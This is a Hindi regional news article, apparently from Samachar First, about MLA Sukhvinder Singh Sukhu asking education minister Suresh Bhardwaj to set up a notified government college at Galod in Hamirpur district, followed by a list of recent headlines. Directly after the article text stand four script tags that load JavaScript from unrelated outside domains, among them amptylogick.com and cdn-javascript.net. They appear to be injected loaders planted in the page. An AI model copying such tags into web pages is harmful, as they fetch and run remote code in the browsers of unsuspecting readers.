Categories: हिमाचल

हमीरपुरः सुखविंदर सिंह सुक्खू ने शिक्षा मंत्री सुरेश भारद्वाज से की मुलाकात

<p>जिला हमीरपुर में नादौन विधानसभा क्षेत्र के गलोड की जनता एवं पंचायत प्रतिनिधियों की मांग पर कांग्रेस के पूर्व प्रदेश अध्यक्ष एवं नादौन के विधायक सुखविंदर सिंह सुक्खू ने हिमाचल सरकार में शिक्षा मंत्री सुरेश भारद्वाज से मुलाकात की है। इस मुलाकात में उन्होंने शिक्षा मंत्री सुरेश भारद्वाज से मिलकर पूर्व कांग्रेस सरकार के समय में गलोड़ क्षेत्र के लिए सितंबर 2017 में हुई सरकारी क्षेत्र में कॉलेज की अधिसूचना को कार्यान्वित करने की मांग की है। विधायक सुक्खू ने शिक्षा मंत्री से मांग की है कि गलोड़ में सरकारी क्षेत्र में कॉलेज की स्थापना के लिए औपचारिकताओं को जल्द से जल्द पूरा किया जाए।</p>

<p>गलोड़ में कॉलेज खुलने से यहां के छात्रों के समय और धन की भारी बचत होगी। भारी संख्या में यहां के छात्रों को कॉलेज के लिए या तो जिला मुख्यालय हमीरपुर या फिर बड़सर कॉलेज में जाना पड़ता है। जिससे यहां के छात्रों को असुविधा होती है और आर्थिक रूप से कमजोर छात्र कॉलेज पहुंच भी नहीं पाते हैं। विधायक सुक्खू ने बताया कि कॉलेज स्थापना के लिए जरूरी औपचारिकताओं को पूरा करने&nbsp; में गलोड़ जनता और यहां की पंचायतों के प्रतिनिधि प्रशासन का&nbsp; पूरा सहयोग करेंगे।</p>

<p>इस मौके पर शिक्षा मंत्री सुरेश भारद्वाज ने विधायक सुखविंदर सिंह सुक्खू को आश्वासन दिया है कि आने वाले शैक्षणिक सत्र से वह गलोड़ में कॉलेज की कक्षाएं शुरू करने का प्रयास करेंगे। जिले के अंदर आने वाले गांव गलोड़ ब्लॉक कांग्रेस प्रधान कैप्टन प्रेम चन्द, गाहली, हडेटा, गोइस, लहड़ा को पंचायत प्रधान, गलोड़ ख़ास के उपप्रधान और अन्य स्थानीय लोगों ने विधायक सुखविन्दर सिंह सुक्खू का शिक्षा मंत्री के समक्ष गलोड़ कॉलेज की स्थापना का मुद्दा उठाने का धन्यवाद किया।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1576837221470″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

आरिफ मोहम्मद खान ने राज्यपाल शिव प्रताप शुक्ल से भेंट की

Shimla: केरल के राज्यपाल आरिफ मोहम्मद खान अपने तीन दिवसीय हिमाचल दौरे के दौरान आज…

2 mins ago

प्रदेश की आर्थिक बदहाली के लिए भाजपा का आर्थिक कुप्रबंधन जिम्मेदार: कांग्रेस

प्रदेश की आर्थिक बदहाली के लिए भाजपा का आर्थिक कुप्रबंधन जिम्मेदार : कांग्रेस  चुनाव जीतने…

4 mins ago

भाजपा ने किया शिक्षा का बेड़ा गर्क, हमने किए सुधार: रोहित ठाकुर

भाजपा ने किया शिक्षा का बेड़ा गर्क, हमने किए सुधार: रोहित ठाकुर  शिक्षा में सुधार…

7 mins ago

किन्नौर पहुंचे नेता प्रतिपक्ष, पन्ना प्रमुख सम्मेलन को संबोधित कर कंगना के लिए मांगे वोट

किन्नौर पहुँचे नेता प्रतिपक्ष, पन्ना प्रमुख सम्मेलन को संबोधित कर कंगना के लिए मांगे वोट…

15 mins ago

राष्ट्रपति का 4 से 8 मई तक हिमाचल दौरा, मुख्य सचिव ने लिया तैयारियों का जायजा

राष्ट्रपति द्रौपदी मुर्मू के शिमला दौरे की तैयारियां इन दिनों जोरों पर हैं। 4 मई…

24 mins ago

विश्वविद्यालय के वाणिज्य में PHD के ST आरक्षित पद को रातों रात बना दिया गया सामान्य वर्ग

विश्वविद्यालय के वाणिज्य में PHD के ST आरक्षित पद को रातों रात बना दिया गया…

27 mins ago